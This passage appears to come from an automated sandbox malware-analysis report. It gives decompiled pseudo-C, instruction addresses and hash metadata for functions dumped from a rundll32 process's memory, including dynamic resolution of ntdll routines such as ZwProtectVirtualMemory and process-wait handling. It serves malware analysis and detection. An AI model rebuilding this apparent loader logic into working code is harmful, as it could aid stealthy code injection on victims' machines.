				E00000215215205CA2DC(_t27, _t29, _t29, "ZwProtectVirtualMemory", _t51, _t52);
				 *0x206832e0 = _t27;
				if (_t27 == 0) goto 0x205c9e06;
				E00000215215205CA2DC(_t27, _t29, _t29, "RtlAnsiStringToUnicodeString", _t51, _t52);
				 *0x206832e8 = _t27;
				if (_t27 == 0) goto 0x205c9e06;
				E00000215215205CA2DC(_t27, _t29, _t29, "RtlFreeUnicodeString", _t51, _t52);
				 *0x206832f0 = _t27;
				if (_t27 == 0) goto 0x205c9e06;
				asm("movups xmm0, [0xb94e5]");
				asm("movups [esi], xmm0");
				asm("movups xmm1, [0xb94eb]");
				asm("movups [esi+0x10], xmm1");
				asm("movsd xmm0, [0xb94ef]");
				asm("movsd [esi+0x20], xmm0");
				return 0;
			}











                0x215205c9cf0
                0x215205c9cf0
                0x215205c9cf5
                0x215205c9d04
                0x215205c9d0b
                0x215205c9d0d
                0x215205c9d14
                0x215205c9d16
                0x215205c9d1d
                0x215205c9d2f
                0x215205c9d35
                0x215205c9d3b
                0x215205c9d48
                0x215205c9d51
                0x215205c9d61
                0x215205c9d66
                0x215205c9d70
                0x215205c9d80
                0x215205c9d85
                0x215205c9d8f
                0x215205c9d9b
                0x215205c9da0
                0x215205c9daa
                0x215205c9db6
                0x215205c9dbb
                0x215205c9dc5
                0x215205c9dd1
                0x215205c9dd6
                0x215205c9de0
                0x215205c9de4
                0x215205c9deb
                0x215205c9dee
                0x215205c9df5
                0x215205c9df9
                0x215205c9e01
                0x215205c9e17

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModule
                • String ID: LdrGetProcedureAddress$LdrLoadDll$RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$ZwProtectVirtualMemory$kernel32.dll$ntdll.dll
                • API String ID: 4139908857-3936008073
                • Opcode ID: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction ID: efe8b370040ecc74d3fabaa576266a8d97d9c3a114eec12ec5e6e7f0d7c8a0df
                • Opcode Fuzzy Hash: c5a052427b3ec778cdb5bb9aa685819040ed37b6c136b296b2a08f91c9af0b8e
                • Instruction Fuzzy Hash: BF312A33703F75C1FA61CB25A89D3D063A4AFF4760F5852A59D4D062AAEF78E685C240
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205BA9E0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 424synchronizationnetworkCOMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E00000215215205BA9E0(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, intOrPtr* __r8, long long __r9, long long __r14, char _a40) {
				void* _v8;
				long long _v128;
				char _v232;
				long long _v320;
				char _v424;
				char _v472;
				char _v528;
				char _v560;
				intOrPtr _v568;
				long long _v656;
				char _v664;
				char _v712;
				long long _v760;
				char _v768;
				long long _v776;
				long long _v800;
				char _v808;
				long long _v816;
				char _v872;
				long long _v880;
				char _v936;
				signed long long _v944;
				long long _v952;
				long long _v968;
				intOrPtr _v984;
				char _v1008;
				long long _v1016;
				long long _v1024;
				long long _v1032;
				long long _v1040;
				long long _v1048;
				long long _v1056;
				char _v1064;
				long long _v1072;
				long long _v1080;
				void* _v1088;
				long long _v1096;
				long long _v1104;
				char _v1112;
				long long _v1120;
				long long _v1136;
				long long _v1144;
				char _v1160;
				signed long long _v1176;
				long long _v1184;
				long long _v1192;
				long long _v1200;
				long long _v1208;
				long long _v1216;
				long long _v1224;
				long long _v1232;
				long long _v1240;
				long long _v1256;
				intOrPtr _v1272;
				intOrPtr _v1280;
				char _v1288;
				signed long long _v1296;
				long _v1304;
				long long _v1312;
				char _v1320;
				long long _v1328;
				long long _v1336;
				signed long long _v1344;
				long _v1352;
				char _v1359;
				intOrPtr* _v1376;
				signed long long _v1400;
				intOrPtr _v1416;
				char _v1424;
				intOrPtr _v1440;
				char _v1448;
				long long _v1456;
				long long _v1464;
				long long _v1472;
				long long _v1480;
				char _v1536;
				long long _v1544;
				char _v1600;
				long long _v1608;
				char _v1616;
				long long _v1624;
				char _v1632;
				long long _v1640;
				long long _v1648;
				long long _v1656;
				long long _v1664;
				char _v1672;
				long long _v1680;
				long long _v1688;
				long long _v1696;
				long long _v1704;
				char _v1712;
				intOrPtr _v1720;
				char _v1736;
				char _v1744;
				char _v1752;
				long long _v1760;
				void* _v1768;
				long long _v1776;
				char _v1784;
				signed long long _v1792;
				intOrPtr _v1800;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				char _v1828;
				signed int _v1829;
				char _v1830;
				signed char _v1831;
				signed int _v1832;
				long long _v1848;
				long long _v1856;
				long long _v1864;
				signed int _t265;
				signed int _t266;
				void* _t293;
				intOrPtr _t296;
				intOrPtr _t299;
				signed int _t300;
				signed int _t301;
				void* _t307;
				void* _t308;
				void* _t335;
				long long _t355;
				long long _t356;
				long long _t358;
				long long _t359;
				long long _t362;
				signed long long _t363;
				signed long long _t365;
				intOrPtr* _t372;
				long long _t373;
				signed long long _t375;
				char* _t381;
				long long _t382;
				intOrPtr* _t385;
				long long _t388;
				intOrPtr* _t391;
				long long _t411;
				intOrPtr* _t426;
				intOrPtr* _t429;
				long long _t435;
				long long _t440;
				long long _t450;
				long long _t463;
				void* _t467;
				void* _t470;
				char* _t479;
				long long _t480;
				void* _t493;
				long long _t495;

				_t488 = __r9;
				_t473 = __r8;
				_t469 = __rbp;
				_t309 = __eflags;
				_t307 = __esi;
				_t300 = __edx;
				_t293 = __ebx;
				_t335 = _t470;
				 *((long long*)(_t335 - 0x468)) = 0xfffffffe;
				 *((long long*)(_t335 + 8)) = __rbx;
				 *((long long*)(_t335 + 0x10)) = __rsi;
				 *((long long*)(_t335 + 0x18)) = __rdi;
				 *((long long*)(_t335 + 0x20)) = __r14;
				asm("movaps [eax-0x18], xmm6");
				_t463 = __r9;
				_t372 = __r8;
				_t467 = __rdx;
				_t493 = __rcx;
				E0000021521520594A10(__edx, __edi, __eflags, _t335, __r8, _t335 - 0x6c8, __rdx, __rdx, __rbp, __r8, __r9);
				_t381 =  &_v1424;
				E00000215215205BB650(_t309, _t335, _t381);
				_t435 = _v1416 - _v1424;
				r15d = 0;
				_t382 =  !=  ? _v1424 : _t381;
				_v1120 = _t382;
				_v1040 = _t435;
				_v1632 = _t382;
				_v1624 = _t435;
				E00000215215205B9ED0(r15d, _t335, _t372,  &_v232,  &_v1736, _t473, __r9);
				_v816 = _t495;
				_v1672 = _t463;
				_v1664 =  &_v1424;
				_v1656 =  &_v232;
				_v1648 =  &_v1632;
				_v1640 =  &_v872;
				_v1480 = _t495;
				_v1032 =  &_v1536;
				_v1024 =  &_v1536;
				_v1536 = 0x2063fb60;
				_v1536 = 0x2063f958;
				asm("movups xmm0, [esp+0xe0]");
				asm("movups [esp+0x170], xmm0");
				asm("movups xmm1, [esp+0xf0]");
				asm("movups [esp+0x180], xmm1");
				asm("movsd xmm0, [esp+0x100]");
				asm("movsd [esp+0x190], xmm0");
				_v1480 =  &_v1536;
				E00000215215205BCC90(_t300, _t372,  &_v1536,  &_v872, _t467);
				_t385 = _v1480;
				if (_t385 == 0) goto 0x205baba1;
				_t301 = _t300 & 0xffffff00 | _t385 !=  &_v1536;
				 *((intOrPtr*)( *_t385 + 0x20))();
				_v1480 = _t495;
				E00000215215205BB650(_t385 -  &_v1536,  *_t385,  &_v1448);
				_t440 = _v1440 - _v1448;
				_t388 =  !=  ? _v1448 : _t495;
				_v1136 = _t388;
				_v1016 = _t440;
				_v1616 = _t388;
				_v1608 = _t440;
				E00000215215205B9ED0(r15d,  *_t385, _t372,  &_v424,  &_v1736, _t473, _t488);
				_v880 = _t495;
				_v1712 = _a40;
				_v1704 =  &_v1448;
				_v1696 =  &_v424;
				_v1688 =  &_v1616;
				_v1680 =  &_v936;
				_v1544 = _t495;
				_v952 =  &_v1600;
				_v1240 =  &_v1600;
				_v1600 = 0x2063fb60;
				_v1600 = 0x2063fa40;
				asm("movups xmm0, [esp+0xb8]");
				asm("movups [esp+0x130], xmm0");
				asm("movups xmm1, [esp+0xc8]");
				asm("movups [esp+0x140], xmm1");
				asm("movsd xmm0, [esp+0xd8]");
				asm("movsd [esp+0x150], xmm0");
				_v1544 =  &_v1600;
				E00000215215205BCC90(_t301, _t372,  &_v1600,  &_v936, _t467);
				_t391 = _v1544;
				if (_t391 == 0) goto 0x205bad19;
				_t302 = _t301 & 0xffffff00 | _t391 !=  &_v1600;
				 *((intOrPtr*)( *_t391 + 0x20))();
				_v1544 = _t495;
				_t355 =  *((intOrPtr*)(_t372 + 0x10));
				_v1232 = _t355;
				if ( *((long long*)(_t372 + 0x18)) - 0x10 < 0) goto 0x205bad2f;
				_t373 =  *_t372;
				_v1760 = _t373;
				_v1336 = _t373;
				_v1328 = _t355;
				E00000215215205B9ED0(r15d, _t355, _t373,  &_v664,  &_v1736, _t473, _t488);
				E00000215215205BA730(_t355, _t373,  &_v1288);
				_v1224 = _t355;
				E00000215215205BCB20( *((long long*)(_t372 + 0x18)) - 0x10, _t355, _t373,  &_v1008, _t355, _t467);
				if (_v1272 == 0) goto 0x205badb8;
				E00000215215205BBE00(_t301 & 0xffffff00 | _t391 !=  &_v1600, _v1272, _v1256 - _v1272 >> 3);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x270], xmm0");
				_v1256 = _t495;
				if (_v1280 == 0) goto 0x205badcc;
				_v1288();
				E0000021521520589490(_t373,  &_v1672, _t493, _t467, __rbp, " ", _t488);
				E00000215215205895D0( &_v1712, _t355, 0x2063fb60, _t467, _t469, _t467, _t488);
				_v1216 = _t355;
				_v1104 = _v656;
				_v1096 =  &_v664;
				_v1080 = _v320;
				_v1072 =  &_v424;
				_v1056 = _v128;
				_v1048 =  &_v232;
				_v1848 = 0x2063b1c0;
				_v1856 =  &_v1008;
				_v1864 =  &_v1112;
				_t479 =  &_v1064;
				E0000021521520586820(E0000021521520586820(E00000215215205BD200( &_v1400), r15d,  &_v1712), r15d,  &_v1672);
				_t356 =  &_v664;
				_v1208 = _t356;
				_v1832 = _v1832 & 0x000000ff;
				_v1472 = _t356;
				_v1464 = _t356;
				_v1456 = _t495;
				asm("movups xmm0, [esp+0x1a8]");
				asm("movaps [esp+0x480], xmm0");
				asm("movsd xmm1, [esp+0x1b8]");
				asm("movsd [esp+0x490], xmm1");
				_v800 =  &_v664;
				asm("movups xmm1, [esp+0x230]");
				asm("movups [esp+0x450], xmm1");
				_v776 = _t495;
				_t358 =  &_v664;
				_v760 = _t358;
				_v768 = 1;
				asm("movdqa xmm0, xmm1");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				_t411 =  !=  ? _t495 : _t479;
				_v1144 = _t411;
				asm("dec ax");
				_t450 = _t355 + _t411;
				_v1200 = _t450;
				_t480 = _t479 - _t411;
				_v1192 = _t480;
				_t359 =  <  ? _t480 : _t358;
				_v1184 = _t359;
				_v1320 = _t450;
				_v1312 = _t359;
				_v1864 =  &_v528;
				E00000215215205C16C0(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t307, _t308, _t373, _v568,  &_v560, _t467, _t469,  &_v1320,  &_v808);
				_v1831 = _v1832 & 0x000000ff;
				_v1752 =  &_v232;
				E00000215215205BE110(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t373,  &_v1752,  &_v872, 0x2063fb60, _t467,  &_v1632,  &_v808);
				_v1830 = _v1831 & 0x000000ff;
				_t362 =  &_v424;
				_v1744 = _t362;
				E00000215215205BE110(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t373,  &_v1744,  &_v936, 0x2063fb60, _t467,  &_v1616,  &_v808);
				_v1784 = _t362;
				_v1776 = _t362;
				_v1768 = _t495;
				_t265 = E0000021521520593C30(_t373, _v1720,  &_v1784, 0x2063fb60, _t467);
				_t363 = _v1768;
				if ((_t265 & 0x00000001) == 0) goto 0x205bb0bf;
				if (_t363 != 1) goto 0x205bb09e;
				_t266 = _t265 & 0xffffff00 | _v1784 != 0x00000000;
				_v1829 = _t266;
				if (_t266 == 0) goto 0x205bb0bf;
				E0000021521520590A80(r15d, _t363, _t373,  &_v472,  &_v1784);
				E000002152152059DF30(_t266, _t373,  &_v472, _t467,  &_v1616);
				_v1800 = r15d;
				E00000215215205BC080( &_v472,  &_v1784);
				_v1792 = _t363;
				if (_v1359 != 0) goto 0x205bb22f;
				_t296 =  *_v1376;
				_v1820 = _t296;
				if (_t296 != 0x103) goto 0x205bb22f;
				_t365 = _v1400 - 1;
				if (_t365 - 0xfffffffd > 0) goto 0x205bb22f;
				_v1828 = 1;
				if (WaitForSingleObject(??, ??) != 0xffffffff) goto 0x205bb156;
				E00000215215205BC080(_v1400,  &_v1784);
				_v1176 = _t365;
				_v1304 = GetLastError();
				_v1296 = _t365;
				asm("movaps xmm6, [esp+0x250]");
				asm("movaps [esp+0x60], xmm6");
				goto 0x205bb1b5;
				if (GetExitCodeProcess(??, ??) != 0) goto 0x205bb1a1;
				E00000215215205BC080(_v1400,  &_v1828);
				_t375 = _t365;
				_v944 = _t365;
				_v1352 = GetLastError();
				_v1344 = _t375;
				asm("movaps xmm6, [esp+0x220]");
				asm("movaps [esp+0x60], xmm6");
				goto 0x205bb1b5;
				_v1800 = r15d;
				E00000215215205BC080(_v1400,  &_v1828);
				_v1792 = _t365;
				asm("movaps xmm6, [esp+0x60]");
				CloseHandle(??);
				_t376 = _t375 | 0xffffffff;
				_v1400 = _t375 | 0xffffffff;
				if (_v1800 != 0) goto 0x205bb1e6;
				 *_v1376 = _v1828;
				goto 0x205bb233;
				asm("movdqa [esp+0x2e0], xmm6");
				E00000215215205B80C0( *_v1376, _t302 | 0xffffffff, _t375 | 0xffffffff,  &_v712,  &_v1160, _t467, _t469, "wait error");
				_v712 = 0x2063fa28;
				E00000215215205F9940(_t375 | 0xffffffff,  &_v712, 0x2066bb58, _t467);
				_t299 =  *_v1376;
				_v1816 = _t299;
				_v1824 = _t299;
				E00000215215205BA460(_v1376, _t376 | 0xffffffff,  &_v1400, _t467);
				if (_v984 == 0) goto 0x205bb28a;
				E00000215215205BBE00(_t302 | 0xffffffff, _v984, _v968 - _v984 >> 3);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x390], xmm0");
				_v968 = _t495;
				E00000215215205889C0(_t299,  &_v1008);
				E00000215215205B9F90(_v1376, _t376 | 0xffffffff,  &_v664);
				_t426 = _v880;
				if (_t426 == 0) goto 0x205bb2cf;
				 *((intOrPtr*)( *_t426 + 0x20))();
				_v880 = _t495;
				E00000215215205B9F90( *_t426, _t376 | 0xffffffff,  &_v424);
				E00000215215205889C0(_t299,  &_v1448);
				_t429 = _v816;
				if (_t429 == 0) goto 0x205bb314;
				 *((intOrPtr*)( *_t429 + 0x20))();
				_v816 = _t495;
				E00000215215205B9F90( *_t429, _t376 | 0xffffffff,  &_v232);
				E00000215215205889C0(_t299,  &_v1424);
				asm("lock xadd [0xc81a8], ebx");
				if (_t293 != 1) goto 0x205bb344;
				__imp__#116();
				E00000215215205917D0(_t376 | 0xffffffff,  &_v1736, _t467);
				asm("inc ecx");
				return _v1824;
			}


























































































































































                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9e0
                0x215205ba9ec
                0x215205ba9f7
                0x215205ba9fb
                0x215205ba9ff
                0x215205baa03
                0x215205baa07
                0x215205baa0b
                0x215205baa0e
                0x215205baa11
                0x215205baa14
                0x215205baa1e
                0x215205baa24
                0x215205baa2c
                0x215205baa3a
                0x215205baa42
                0x215205baa4b
                0x215205baa54
                0x215205baa5c
                0x215205baa64
                0x215205baa6c
                0x215205baa84
                0x215205baa8a
                0x215205baa92
                0x215205baaa2
                0x215205baab2
                0x215205baac2
                0x215205baad2
                0x215205baada
                0x215205baaea
                0x215205baafa
                0x215205bab09
                0x215205bab18
                0x215205bab20
                0x215205bab28
                0x215205bab30
                0x215205bab38
                0x215205bab40
                0x215205bab49
                0x215205bab5a
                0x215205bab72
                0x215205bab78
                0x215205bab83
                0x215205bab93
                0x215205bab96
                0x215205bab99
                0x215205baba9
                0x215205babb7
                0x215205babc2
                0x215205babcb
                0x215205babd3
                0x215205babdb
                0x215205babe3
                0x215205babfb
                0x215205bac01
                0x215205bac11
                0x215205bac21
                0x215205bac31
                0x215205bac41
                0x215205bac51
                0x215205bac59
                0x215205bac69
                0x215205bac79
                0x215205bac81
                0x215205bac90
                0x215205bac98
                0x215205baca0
                0x215205baca8
                0x215205bacb0
                0x215205bacb8
                0x215205bacc1
                0x215205bacd2
                0x215205bacea
                0x215205bacf0
                0x215205bacfb
                0x215205bad0b
                0x215205bad0e
                0x215205bad11
                0x215205bad19
                0x215205bad1d
                0x215205bad2a
                0x215205bad2c
                0x215205bad2f
                0x215205bad37
                0x215205bad3f
                0x215205bad57
                0x215205bad65
                0x215205bad6a
                0x215205bad7d
                0x215205bad8e
                0x215205bad9f
                0x215205bada4
                0x215205bada7
                0x215205badb0
                0x215205badc3
                0x215205badc5
                0x215205badde
                0x215205badf2
                0x215205badf7
                0x215205bae07
                0x215205bae17
                0x215205bae27
                0x215205bae37
                0x215205bae47
                0x215205bae57
                0x215205bae66
                0x215205bae73
                0x215205bae80
                0x215205bae8d
                0x215205baebc
                0x215205baec1
                0x215205baec9
                0x215205baed6
                0x215205baedc
                0x215205baee4
                0x215205baeec
                0x215205baef4
                0x215205baefc
                0x215205baf04
                0x215205baf0d
                0x215205baf1e
                0x215205baf26
                0x215205baf2e
                0x215205baf36
                0x215205baf3e
                0x215205baf46
                0x215205baf4e
                0x215205baf59
                0x215205baf5d
                0x215205baf62
                0x215205baf6d
                0x215205baf71
                0x215205baf79
                0x215205baf7e
                0x215205baf81
                0x215205baf89
                0x215205baf8c
                0x215205baf9c
                0x215205bafa0
                0x215205bafa8
                0x215205bafb0
                0x215205bafc0
                0x215205bafe5
                0x215205bafef
                0x215205baffb
                0x215205bb01b
                0x215205bb025
                0x215205bb029
                0x215205bb031
                0x215205bb051
                0x215205bb058
                0x215205bb05d
                0x215205bb062
                0x215205bb077
                0x215205bb07c
                0x215205bb086
                0x215205bb08c
                0x215205bb093
                0x215205bb096
                0x215205bb09c
                0x215205bb0ab
                0x215205bb0b9
                0x215205bb0bf
                0x215205bb0c4
                0x215205bb0c9
                0x215205bb0d6
                0x215205bb0e4
                0x215205bb0e6
                0x215205bb0f0
                0x215205bb0fe
                0x215205bb106
                0x215205bb10c
                0x215205bb120
                0x215205bb122
                0x215205bb12a
                0x215205bb138
                0x215205bb13f
                0x215205bb147
                0x215205bb14f
                0x215205bb154
                0x215205bb16b
                0x215205bb16d
                0x215205bb172
                0x215205bb175
                0x215205bb183
                0x215205bb18a
                0x215205bb192
                0x215205bb19a
                0x215205bb19f
                0x215205bb1a1
                0x215205bb1a6
                0x215205bb1ab
                0x215205bb1b0
                0x215205bb1bd
                0x215205bb1c3
                0x215205bb1c7
                0x215205bb1d4
                0x215205bb1e2
                0x215205bb1e4
                0x215205bb1e6
                0x215205bb206
                0x215205bb213
                0x215205bb22a
                0x215205bb23b
                0x215205bb23d
                0x215205bb243
                0x215205bb24f
                0x215205bb260
                0x215205bb271
                0x215205bb276
                0x215205bb279
                0x215205bb282
                0x215205bb292
                0x215205bb2a0
                0x215205bb2a6
                0x215205bb2b1
                0x215205bb2c4
                0x215205bb2c7
                0x215205bb2d7
                0x215205bb2e5
                0x215205bb2eb
                0x215205bb2f6
                0x215205bb309
                0x215205bb30c
                0x215205bb31c
                0x215205bb32a
                0x215205bb330
                0x215205bb33b
                0x215205bb33d
                0x215205bb34c
                0x215205bb36e
                0x215205bb378

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CleanupCloseCodeExceptionExitHandleObjectProcessSingleStartupThrowWait
                • String ID: wait error
                • API String ID: 1743618437-4158087810
                • Opcode ID: 06f834677d2f740243c0c14ad8df5bb738393c86fb7ca113d889df3d4f88d045
                • Instruction ID: f62a2d70e2a6e0b5ef52f39f8bffe26cc52f524643e94a926f0d2764d8d3a828
                • Opcode Fuzzy Hash: 06f834677d2f740243c0c14ad8df5bb738393c86fb7ca113d889df3d4f88d045
                • Instruction Fuzzy Hash: 0232F17220AFC4D5EA719B24E4843EAB3A4FBD9750F505226DADD43A9DEF38C194CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205935D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 141COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E00000215215205935D0(signed int __edi, long long __rbx, long long __rcx, long long __rdx, long long __rbp, void* __r9, long long _a16) {
				void* _v24;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v240;
				long long _v248;
				long long _v256;
				long long _v264;
				long long _v272;
				char _v280;
				void* __rdi;
				void* __rsi;
				int _t55;
				void* _t70;
				void* _t71;
				signed int _t84;
				void* _t85;
				void* _t87;
				long long _t104;
				long _t124;
				longlong _t127;
				void* _t133;
				void* _t136;
				void* _t140;
				void* _t141;
				struct _OSVERSIONINFOEXA* _t143;

				_t140 = __r9;
				_t121 = __rdx;
				_t141 = _t133;
				 *((long long*)(_t141 + 8)) = __rcx;
				_v256 = 0xfffffffe;
				 *((long long*)(_t141 + 0x18)) = __rbx;
				 *((long long*)(_t141 + 0x20)) = __rbp;
				_t104 = __rcx;
				 *((long long*)(__rcx)) = 0x2063c108;
				r14d = 0;
				 *(__rcx + 8) = _t143;
				 *(__rcx + 0x10) = _t143;
				 *((long long*)(__rcx + 0x18)) = __rdx;
				 *(__rcx + 0x20) = _t143;
				 *((long long*)(__rcx)) = 0x2063f570;
				 *((long long*)(__rcx)) = 0x2063c748;
				 *(__rcx + 0x28) = _t143;
				 *(__rcx + 0x30) = _t143;
				 *(__rcx + 0x38) = _t143;
				r8d = 0x9c;
				E00000215215205F8EF0(_t71, 0, __edi, _t87, _t141 - 0xb8, __rdx, _t124, _t136);
				_v184 = 0x9c;
				_v180 = 6;
				r8b = 3;
				__imp__VerSetConditionMask();
				_t16 =  &(_t143->dwOSVersionInfoSize); // 0x2
				_t55 = VerifyVersionInfoA(_t143, _t124, _t127);
				_t84 = __edi | 0xffffffff;
				_t74 =  !=  ? _t84 : 0x1f4;
				 *((intOrPtr*)(_t104 + 0x40)) =  !=  ? _t84 : 0x1f4;
				 *(_t104 + 0x48) = _t143;
				 *(_t104 + 0x50) = _t143;
				 *((intOrPtr*)(_t104 + 0x58)) = r14d;
				_t22 = _t104 + 0x60; // 0x60
				E00000215215205913B0(_t16, _t55, _t104, _t22, __rdx, _t127);
				 *(_t104 + 0x88) = _t143;
				 *(_t104 + 0x90) = _t143;
				 *(_t104 + 0x98) = _t143;
				 *((intOrPtr*)(_t104 + 0xa0)) = 0xffffffff;
				 *(_t104 + 0xa8) = _t143;
				r9d = _t84;
				r8d = 0;
				CreateIoCompletionPort(??, ??, ??, ??);
				 *((long long*)(_t104 + 0x28)) = 0x2063c748;
				if (0x2063c748 != 0) goto 0x2059377b;
				_t85 = GetLastError();
				E000002152152058F380(_t22 | 0xffffffff, _t121);
				_v280 = 0x2063c748;
				_v272 = 0x2063c748;
				if ( *0x2152063C750 + 0xda812030 - 1 <= 0) goto 0x20593731;
				 *((intOrPtr*)( *0x2063c748 + 0x30))();
				goto 0x20593736;
				_v264 = 0xda812030;
				_v280 = _t85;
				_v272 = 0x2063c748;
				if (((0 | _t85 != 0x00000000) & 1) == 0) goto 0x2059377b;
				if (0x4d54ee85da812032 != 1) goto 0x20593759;
				if (_t85 == 0) goto 0x2059377b;
				E0000021521520590B90( !=  ? _t84 : 0x1f4, _t104,  &_v240,  &_v280, "iocp");
				E000002152152059DF30(_t85, _t104,  &_v240, 0x2063c748, "iocp");
				if (bpl == 0) goto 0x20593805;
				asm("lock inc dword [ebx+0x30]");
				E00000215215205F4DCC(0x4d54ee85da812032,  &_v240);
				_a16 = 0x4d54ee85da812032;
				 *0x4D54EE85DA81203A = _t143;
				 *0x4D54EE85DA812042 = _t143;
				E00000215215205F4DCC(0x4d54ee85da812032,  &_v240);
				_v248 = 0x4d54ee85da812032;
				 *((long long*)(0x4d54ee85da812032)) = 0x2063f7f0;
				 *((long long*)(0x4d54ee85da812032)) = 0x2063c438;
				 *0x4D54EE85DA81204A = _t104;
				r8d = 0;
				E0000021521520591990(_t104, 0x4d54ee85da812032, 0x4d54ee85da812032, 0x4d54ee85da812032, 0x2063c748, _t140);
				if ( *(_t104 + 0xa8) == 0) goto 0x205937fe;
				CloseHandle(??);
				_t70 = E00000215215205F51EC(0x4d54ee85da812032, _t104,  *(_t104 + 0xa8));
				 *(_t104 + 0xa8) = 0x4d54ee85da812032;
				return _t70;
			}




























                0x215205935d0
                0x215205935d0
                0x215205935d0
                0x215205935d3
                0x215205935e2
                0x215205935eb
                0x215205935ef
                0x215205935f7
                0x21520593601
                0x21520593604
                0x21520593607
                0x2152059360b
                0x2152059360f
                0x21520593613
                0x2152059361e
                0x21520593628
                0x2152059362b
                0x2152059362f
                0x21520593633
                0x21520593639
                0x21520593646
                0x2152059364b
                0x21520593656
                0x21520593661
                0x2152059366a
                0x21520593673
                0x2152059367f
                0x2152059368a
                0x2152059368f
                0x21520593692
                0x21520593695
                0x21520593699
                0x2152059369d
                0x215205936a1
                0x215205936a5
                0x215205936ab
                0x215205936b2
                0x215205936b9
                0x215205936c0
                0x215205936ca
                0x215205936d1
                0x215205936d4
                0x215205936dd
                0x215205936e3
                0x215205936ea
                0x215205936f6
                0x215205936f8
                0x21520593702
                0x21520593707
                0x21520593721
                0x2152059372b
                0x2152059372f
                0x2152059373d
                0x21520593742
                0x21520593746
                0x2152059374d
                0x21520593753
                0x21520593757
                0x2152059376a
                0x21520593775
                0x2152059377e
                0x21520593784
                0x2152059378d
                0x21520593795
                0x2152059379d
                0x215205937a1
                0x215205937aa
                0x215205937af
                0x215205937bb
                0x215205937c5
                0x215205937c8
                0x215205937cc
                0x215205937d5
                0x215205937e5
                0x215205937eb
                0x215205937f9
                0x215205937fe
                0x2152059381f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCompletionConditionCreateErrorHandleInfoLastMaskPortVerifyVersion
                • String ID: iocp
                • API String ID: 4287750199-976528080
                • Opcode ID: ab3c2d61510c8957961955912b72ee2fbd86150171343daf3d8515332e47b646
                • Instruction ID: 7b2d0f3fcd26892716b74f1b94a05352b6ac93d381f404b542fa1a21b06854d8
                • Opcode Fuzzy Hash: ab3c2d61510c8957961955912b72ee2fbd86150171343daf3d8515332e47b646
                • Instruction Fuzzy Hash: DC51AB33202F50C6EB609F25E8887D933A5FB94BA4F244225DE9D47BA8DF38C956D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205A55D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00000215215205A55D0(void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;
				intOrPtr _t80;
				long long _t86;
				long long _t89;
				long long* _t100;
				intOrPtr _t103;
				long long _t107;
				long long _t112;
				long long _t115;
				long long _t117;
				void* _t120;
				void* _t126;
				long long _t129;
				long long _t130;
				intOrPtr* _t131;
				intOrPtr _t133;
				void* _t134;
				void* _t136;
				void* _t144;
				long long* _t145;

				 *((long long*)(_t134 + 0x60)) = 0xfffffffe;
				 *((long long*)(_t134 + 0xe8)) = __rbx;
				_t130 = __r8;
				_t145 = __rdx;
				_t100 = __rcx;
				_t144 =  *((intOrPtr*)(__rcx + 0x10)) -  *((intOrPtr*)(__rcx + 8));
				_t131 = __rcx + 0x28;
				_t80 =  *_t131;
				if (_t144 - _t80 > 0) goto 0x205a5746;
				if (__r8 - _t80 - _t144 > 0) goto 0x205a5746;
				_t103 =  *((intOrPtr*)(__rcx + 0x20));
				_t117 =  *((intOrPtr*)(__rcx + 0x10));
				if (__r8 - _t103 - _t117 > 0) goto 0x205a5644;
				 *((long long*)(__rcx + 0x18)) = _t117 + __r8;
				 *__rdx = _t117;
				goto 0x205a57e1;
				if (__r8 - _t103 -  *__rcx - _t144 > 0) goto 0x205a5681;
				if (_t144 == 0) goto 0x205a5665;
				_t136 = _t144;
				E00000215215205F7310(_t62, _t64, _t66, _t67,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t126, __r8, _t136);
				_t86 =  *_t100;
				 *((long long*)(_t100 + 8)) = _t86;
				_t107 = _t86 + _t144;
				 *((long long*)(_t100 + 0x10)) = _t107;
				 *((long long*)(_t100 + 0x18)) = _t107 + __r8;
				goto 0x205a57de;
				 *((long long*)(_t134 + 0xe0)) = _t144 + _t136;
				 *((long long*)(_t134 + 0xf8)) = _t144 + _t144;
